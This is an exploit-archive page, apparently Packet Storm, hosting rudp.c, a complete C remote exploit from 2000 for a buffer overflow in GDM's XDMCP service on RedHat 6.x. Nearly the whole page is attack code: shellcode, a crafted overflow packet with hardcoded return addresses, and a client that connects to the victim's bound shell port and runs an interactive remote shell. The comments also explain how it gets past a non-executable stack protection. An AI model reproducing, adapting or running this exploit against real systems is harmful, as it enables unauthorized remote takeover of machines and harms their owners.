exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

rudp.c

rudp.c
Posted Sep 28, 2000
Authored by Crashkiller

GDM Remote Exploit based on the original bug found by Chris Evans. Vulnerable version : gdm-2.0beta2-23 ( gnome and single version ). Not Vulnerable : 1.0.0.35. Vulnerable Platforms : RedHat 6.0-6.2.

tags | exploit, remote
systems | linux, redhat
SHA-256 | 364b987dc6db265a353592620b92a038c7f3f9dac015ffe2adf1d4b0ff39fb4d

rudp.c

Change Mirror Download
// GDM REMOTE EXploit '2000 
// Coded By Crashkiller (pawq@blue.profex.com.pl)
//
// Bug Found By : Chris Evans - thx to him
//
//
// PRIVATE !!!!!!!!!! !!!!!!!!!!
// SPECIAL THX TO: BugzPl
//
//
// Vunerable version : gdm-2.0beta2-23 ( gnome and single version )
// Not Vulnerable : 1.0.0.35
//
// Vulnerable Platforms :
//
// - RedHat 6.0-6.2
// - Helix GNOME
// - The raw gdm source tarball
//
// Thix Exploit Works Around Non-Executable Stack Patch By Solar Designer

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h> //connect,socket,rec,send
#include <netinet/in.h>
#include <netdb.h>

// shellcode BY ADM
char c0de[] =
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" /* alarm(0); */
"\x33\xD2\x33\xc0\x8b\xDA\xb0\x06\xcd\x80\xfe\xc2\x75\xf4" /* close FDs */
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62\xeb\x62" /* w/ fork() */
//"\x31\xc0\xb0\x02\x90\x90\x85\xc0\x90\x90\xeb\x62" /* w/o fork() */
"\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b" /* =\_ who wrote it? */
"\xeb\xf5\xb0\x30\xfe\xc8\x88\x46\xff\xeb\xec" /* =/` hmm? */
"\x5e\xb0\x02\x89\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb
"
"\xfe\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66\x89\x46
"
"\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
"\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
"\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
"\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
"\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
"\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
"\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77";

void logo() {
printf("------------------------------\n");
printf(" GDM REMOTE EXPLOIT '2000 \n");
printf(" Coded By Crashkiller \n");
printf("------------------------------\n\n");
}

int make_packet(char *buf) {
char deathbuf[60+strlen(c0de)+3+1000];
unsigned short s;
unsigned char c;
int z,a=sizeof(deathbuf);
unsigned long addr;
unsigned char o;
memset(deathbuf, 0x0, sizeof(deathbuf));

deathbuf[0] = 0x43;
deathbuf[1] = 0x43;
deathbuf[2] = 0x43; // a to takie srakie tak ma buc
deathbuf[3] = 0x43;

deathbuf[4] = 0x44; // jeszcze nie wiem co to ,ale tez nadpisuje mi cos
deathbuf[5] = 0x44;
deathbuf[6] = 0x44;
deathbuf[7] = 0x44;

deathbuf[8] = 0x48; // nadpisuje array | // array ma byc 0xbffffa48
deathbuf[9] = 0xfa;
deathbuf[10] = 0xff;
deathbuf[11] = 0xbf;

deathbuf[12] = 0x42; // nadpisuje adres do zmiennych lokalnych
deathbuf[13] = 0x42;
deathbuf[14] = 0x42;
deathbuf[15] = 0x42;

deathbuf[16] = 0x41;
deathbuf[17] = 0x41; // to tez jakies locale :>
deathbuf[18] = 0x41;
deathbuf[19] = 0x41;

deathbuf[20] = 0x41;
deathbuf[21] = 0x16; //locale
deathbuf[22] = 0x06; // istotne - point to our shellcode
deathbuf[23] = 0x08; //0x08 06 16 41

deathbuf[24] = 0x41;
deathbuf[25] = 0x16; // istotne - point to our shellcode
deathbuf[26] = 0x06;
deathbuf[27] = 0x08;

// nasze pikne ret addresy albo jak kto woli dresy
// 0xbffffa7f - shell

deathbuf[28] = 0x58;
deathbuf[29] = 0xfa;
deathbuf[30] = 0xff; // nadpisywane struktorki
deathbuf[31] = 0xbf; //call przedostatni

deathbuf[32] = 0x41; // RET ADDR - point to our shellcode
deathbuf[33] = 0x16; //0x08 06 16 41
deathbuf[34] = 0x06;
deathbuf[35] = 0x08;

// ---------------------------------------------------------------
deathbuf[36] = 0x40; // nadpisuje clnt_sa
deathbuf[37] = 0xfa;
deathbuf[38] = 0xff; //&clnt_sa=0x68686868 powinien byc 0xbffffa80 - 40
deathbuf[39] = 0xbf;

deathbuf[40] = 0x90;
deathbuf[41] = 0x90;
deathbuf[42] = 0x90;
deathbuf[43] = 0x90;

deathbuf[44] = 0x90;
deathbuf[45] = 0x90;
deathbuf[46] = 0x90;
deathbuf[47] = 0x90;

deathbuf[44] = 0x90;
deathbuf[48] = 0x90;
deathbuf[49] = 0x90;
deathbuf[50] = 0x90;

deathbuf[51] = 0x90;
deathbuf[52] = 0x90;
deathbuf[53] = 0x90;
deathbuf[54] = 0x90;

deathbuf[55] = 0x90;
deathbuf[56] = 0x90;
deathbuf[57] = 0x90;
deathbuf[58] = 0x90;
strcat(deathbuf,c0de);
for (z=strlen(deathbuf);z<=a;z++) { deathbuf[z]=0x29;} // calkowicie nie
// istotne :>
deathbuf[a-3] = 0x0;
deathbuf[a-2] = 0x0;
deathbuf[a-1] = 0x0;

printf("Buf : %d and c0de : %d\n",strlen(deathbuf),strlen(c0de));
printf("Strlen : %d \n",strlen(deathbuf));

/* Write the Xdmcp header */
/* Version */
s = htons(1);
memcpy(buf, &s, 2);

/* Opcode: FORWARD_QUERY */
s = htons(4);
memcpy(buf+2, &s, 2);

/* Length */
s = htons(1 + 2 + a + 2);
memcpy(buf+4, &s, 2);

/* Now we're into FORWARD_QUERY which consists of
* remote display, remote port, auth info. Remote display is binary
* IP address data....
*/
/* Remote display: 1000 A's which incidentally smoke a path
* right to the stack
*/
s = htons(sizeof(deathbuf));
memcpy(buf+6, &s, 2);

memcpy(buf+8, deathbuf, sizeof(deathbuf));
/* Display port.. empty data will do */
s = htons(0);
memcpy(buf+8+sizeof(deathbuf), &s, 2);
/* Auth list.. empty data will do */
c = 0;
memcpy(buf + 8 + sizeof(deathbuf) + 2, &c, 1);
return (8+sizeof(deathbuf) + 2 + 1);
}

main(int argc,char *argv[]) {
int pip,ret,i,a;
struct sockaddr_in sck;
char buf[2000],sockbuf[1024];
unsigned short s;
long ia;
char *hostname;
struct hostent *h;
fd_set readfds;
memset(buf , 0x0 ,sizeof(buf));

logo();
if (argc<2)
{
printf("Try %s [victim_host]\n",argv[0]);
exit(-1);
}

pip=socket(PF_INET,SOCK_DGRAM,0);
if (!pip) { perror("socket() ");exit(-1);}
hostname=argv[1];//b0frun
ia=inet_addr(hostname);
if (ia==-1)
if(h=gethostbyname(hostname)) memcpy(&ia,h->h_addr,4); else ia=-1;
if (ia==-1) { fprintf(stderr,"cannot resolve %s ! try connect to internet m
othafucka\n",hostname); exit(0);
} else {
printf("Resolved ... looks good!\n");
}

sck.sin_family = PF_INET;
sck.sin_port = 0;
sck.sin_addr.s_addr=INADDR_ANY;

if (bind(pip,(struct sockaddr *)&sck, sizeof(sck))<0)
{
perror("bind() ");
exit(-1);
}
sck.sin_family = PF_INET;
sck.sin_port = htons(177);
sck.sin_addr.s_addr=ia;
i=make_packet(buf);

sendto(pip,buf,i,0,(struct sockaddr *)&sck,sizeof(sck)); // send packet

printf("Waiting for a shell ......\n");

sleep(3);
close(pip);

pip=socket(PF_INET,SOCK_STREAM,0);
if (!pip)
{
perror("Cant open socket!() ");
exit(-1);
}
sck.sin_family = PF_INET;
sck.sin_port = htons(10752);
sck.sin_addr.s_addr=ia;

if (connect(pip,(struct sockaddr *)&sck,sizeof(sck))<0)
{
printf("Sploit failed or you screwed up !\n");
perror("cant connect() ");
exit(-1);
}
strcpy(sockbuf,"export PATH=/usr/bin:/bin:/usr/sbin:/sbin;/bin/uname -a;/usr/
bin/id;\n");
write(pip,sockbuf,strlen(sockbuf));
memset(sockbuf,0x0,sizeof(sockbuf));
while (1)
{
FD_ZERO (&readfds);
FD_SET (0, &readfds);
FD_SET (pip, &readfds);
select (255, &readfds, NULL, NULL, NULL);
if (FD_ISSET (pip, &readfds))
{
memset (sockbuf, 0, 1024);
ret = read (pip, sockbuf, 1024);
if (ret <= 0)
{
printf ("Connection closed by foreign host.\n");
exit (-1);
}
printf ("%s", sockbuf);
}
if (FD_ISSET (0, &readfds))
{
memset (sockbuf, 0, 1024);
read (0, sockbuf, 1024);
write (pip, sockbuf, strlen(sockbuf));
}
}
close(pip);
}
/* www.hack.co.za [28 September 2000]*/
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close